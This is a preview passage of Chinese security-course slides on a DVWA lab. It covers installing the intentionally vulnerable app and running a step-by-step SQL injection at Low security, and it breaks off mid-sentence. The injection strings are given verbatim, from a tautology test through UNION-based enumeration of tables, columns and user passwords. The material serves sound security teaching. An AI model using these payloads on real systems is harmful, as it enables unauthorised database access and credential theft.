《计算机网络安全防护技术(第二版)》 课件 第7章 任务7.4 DVWA实训_第1页
《计算机网络安全防护技术(第二版)》 课件 第7章 任务7.4 DVWA实训_第2页
《计算机网络安全防护技术(第二版)》 课件 第7章 任务7.4 DVWA实训_第3页
《计算机网络安全防护技术(第二版)》 课件 第7章 任务7.4 DVWA实训_第4页
《计算机网络安全防护技术(第二版)》 课件 第7章 任务7.4 DVWA实训_第5页
已阅读5页,还剩14页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

第7章Web安全技术编著:

秦燊劳翠金

任务7.4DVWA实训任务7.4DVWA实训DVWA(DamnVulnerableWebApplication)是randomstorm的一个开源项目,可用作web安全渗透测试的靶机,提供了XSS、SQL注入、CSRF、暴力破解、命令行注入等十多个漏洞模块接受攻击测试。DVWA的代码分为四种安全级别:Low,Medium,High,Impossible,Low级别的安全性最低,随着安全级别的增加,攻击的难度越来越大,直至漏洞完全补上。一、安装DVWA。1.解压DWVA得到DVWA-master文件夹,把该文件夹复制到网站根目录。2.配置DVWA链接数据库,请打开DVWA-master\config文件夹,将config.inc.php.dist文件复制为config.inc.php,打开config.inc.php。3.在config.inc.php文件中,把$_DVWA['db_password']的值改成'root',与集成环境默认MYSQL的用户名root和密码root保持一致,然后保存。4.通过浏览器访问/DVWA-master/index.php,如图7-4-1所示。图7-4-1网站dvwa的首次配置页面1)页面提示:Ifyouseedisabledoneitherallow_url_fopenorallow_url_include,setthefollowinginyourphp.inifileandrestartApache.allow_url_fopen=Onallow_url_include=On如图7-4-2所示,打开服务器上的php.ini文件,然后,将allow_url_include设置为On。图7-4-2打开配置文件php.ini重启PHPStudy的Apache服务。2)页面提示:reCAPTCHAkey:Missing解决办法是编辑DVWA-master/config/config.inc.php这个配置文件,设置以下的两个key:$_DVWA['recaptcha_public_key']='';$_DVWA['recaptcha_private_key']='';key的生成地址是/recaptcha/admin/create下面是生成好的key:Sitekey:6LdU1mkUAAAAAE_7p83joYR2fG8GK1YpLmUw7u-2Secretkey:6LdU1mkUAAAAAJ-ho4xmsSIbtwC1CVLRHLZ_VzBe把这两个key填上就可以了:$_DVWA['recaptcha_public_key']='6LdU1mkUAAAAAE_7p83joYR2fG8GK1YpLmUw7u-2';$_DVWA['recaptcha_private_key']='6LdU1mkUAAAAAJ-ho4xmsSIbtwC1CVLRHLZ_VzBe';5.再次访问/DVWA-master/login.php,将新打开的页面往下拉,点击“Create/ResetDatabase”按钮,即可创建DVWA的数据库。6.创建好DVWA的数据库后,用户的浏览器自动转到登录页面,这时,需要输入用户名和密码。DVWA默认的用户名和密码有5组:admin/passwordgordonb/abc1231337/charleypablo/letmeinsmithy/password如图7-4-3所示,任选其中一组用户名和密码,输入后,点击“Login”按钮,即可成功登陆DVWA。图7-4-3网站DVWA的登录页面

二、DVWA训练举例

安全级别为Low级的代码对客户端提交的参数不进行任何的检查与过滤,存在着明显的SQL注入漏洞。下面以Low级别的SQL注入攻击为例。

1.将DVWA的安全级别设为Low。

如图7-4-4所示。点击DVWASecurity,将安全级别从默认的Impossible,改为Low,然后点击“Submit”按钮,提交更改结果。图7-4-4设置网站DVWA的安全级别2.判断是否存在SQL注入漏洞,如图7-4-5所示,输入1,点击“Submit”按钮,查询成功。图7-4-5判断是否存在SQL注入漏洞3.进一步判断SQL注入漏洞是字符型还是数字型。如图7-4-6所示,输入1'or'1234'='1234,点击“Submit”按钮。返回了多个结果,说明存在字符型SQL注入漏洞。图7-4-6判断SQL注入漏洞是字符型还是数字型4.尝试找出当前SQL查询语句的字段数1)如图7-4-7所示,输入1'or1=1orderby1#,点击“Submit”按钮。查询成功。图7-4-7判断当前查询的字段数是否为12)如图7-4-8所示,输入1'or1=1orderby2#,点击“Submit”按钮。查询成功。图7-4-8判断当前查询的字段数是否为23)如图7-4-9所示,输入1'or1=1orderby3#,点击“Submit”按钮。查询失败。可见,当前的SQL查询语句包含两个字段。图7-4-9判断当前查询的字段数是否为35.尝试找出当前数据库的名称。如图7-4-10所示,输入1'unionselect1,database()#,点击“Submit”按钮。通过查询结果,可以看到当前的数据库名称为dvwa。图7-4-10尝试找出当前数据库的名称

6.尝试找出当前数据库中有哪些表。如图7-4-11所示,输入:1'unionselect1,group_concat(table_name)frominformation_schema.tableswheretable_schema=database()#然后点击“Submit”按钮。通过查询结果,可以看到当前数据库中一共有两个表,分别是guestbook和users。图7-4-11尝试找出当前数据库中有哪些表

7.获取表中的字段名如图7-4-12所示,输入:1'unionselect1,group_concat(column_name)frominformation_schema.columnswheretable_name='users'#然后点击“Submit”按钮。通过查询结果,可以看到users表中有8个字段,分别是user_id,first_name,last_name,user,password,avatar,last_login,failed_login。图7-4-12获取表中的字段名

8.查询表中的数据如图7-4-13所示,输入:1'or1=1unionselectgroup_concat(user_id,user),group_concat(password)fromusers#然后点击“Submit”按钮。图7-4-13查询表中的数据

通过查询结果,可以看到users表中的user_id,user,password等数据。以user_id为1的用户为例,它的用户名user和密码password如下:用户名use

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论